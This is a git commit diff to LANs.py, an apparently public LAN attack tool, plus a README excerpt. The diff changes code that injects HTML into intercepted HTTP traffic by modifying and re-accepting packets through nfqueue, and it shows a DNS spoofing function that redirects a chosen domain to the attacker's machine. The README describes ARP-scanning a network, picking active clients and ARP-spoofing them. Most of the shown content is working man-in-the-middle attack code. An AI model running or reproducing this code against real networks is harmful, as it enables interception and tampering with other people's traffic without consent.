This commit is contained in:
DanMcInerney 2014-01-04 08:32:26 -05:00
parent 2ce543e2f6
commit 89005f41b8
2 changed files with 8 additions and 11 deletions

17
LANs.py
View file

@ -293,9 +293,9 @@ class Parser():
# Recompress data if necessary
if 'Content-Encoding: gzip' in headers:
if body != '':
# debugger = open('/home/user/projects/injectedBody', 'w')
# debugger.write(body)
# debugger.close()
#debugger = open('injectedBody', 'w') #########################################
#debugger.write(body) #########################################
#debugger.close() #########################################
try:
comp_body = StringIO()
f = gzip.GzipFile(fileobj=comp_body, mode='w', compresslevel = 9)
@ -308,8 +308,7 @@ class Parser():
pkt[IP].len = len(str(pkt))
del pkt[IP].chksum
del pkt[TCP].chksum
payload.set_verdict(nfqueue.NF_DROP)
send(pkt)
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
print '[-] Could not recompress html, sent packet as is'
self.html_url = None
return
@ -324,16 +323,15 @@ class Parser():
del pkt[IP].chksum
del pkt[TCP].chksum
try:
send(pkt)
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
print R+'[!] Injected HTML into packet for '+W+self.html_url
logger.write('[!] Injected HTML into packet for '+self.html_url)
self.block_acks.append(ack)
payload.set_verdict(nfqueue.NF_DROP)
self.html_url = None
except Exception:
except Exception as e:
payload.set_verdict(nfqueue.NF_ACCEPT)
self.html_url = None
print '[-] Failed to inject packet'
print '[-] Failed to inject packet', e
return
if len(self.block_acks) > 30:
@ -717,7 +715,6 @@ class Parser():
logger.write('[!] Decoded:'+decoded+'\n')
# Spoof DNS for a specific domain to point to your machine
# Make this more reliable by blocking all DNS responses from the server using the IP_src maybe a self.dnsSrc var
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, payload):
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
if self.args.dnsspoof:

View file

@ -28,7 +28,7 @@ Usage
python LANs.py
```
Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
### Passive harvesting: